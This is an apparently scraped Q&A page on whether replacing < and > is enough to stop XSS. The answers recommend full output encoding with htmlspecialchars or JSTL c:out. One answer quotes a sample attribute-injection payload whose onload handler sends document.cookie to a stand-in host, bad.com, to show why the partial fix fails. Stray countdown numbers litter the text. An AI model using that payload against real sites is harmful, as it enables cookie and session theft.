[ACCEPTED]-Is replacing : < and > with < and > enough to prevent XSS injection?-code-injection
It depends very much on context.
Check out 11 this example, from a typical forum site...
You 10 may hotlink your avatar image. Enter the 9 full URL.
Malicious user enters in input 8 field
http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie)
There is no encoding there of less 7 than and greater than, but still a big security 6 hole.
With htmlspecialchars(), I found it a good idea to make 5 (or use) a wrapper function of it that casts 4 to a string, provides an easier way to disable 3 double encoding (if necessary) and to ensure 2 it is using the correct character set of 1 your application. Kohana has a great example.
You should also take doublequotes ", singlequotes 9 ' and ampersands & into account. If you do 8 that all during displaying/generating the output, then 7 yes, it's enough.
You should only ensure that you 6 do this for any user-controlled input, such 5 as request parameters, request URL, request 4 headers and user-controlled input which 3 is been stored in a datastore.
In PHP you 2 can do that with htmlspecialchars() and in JSP cou can do 1 that with JSTL <c:out>.
More Related questions
We use cookies to improve the performance of the site. By staying on our site, you agree to the terms of use of cookies.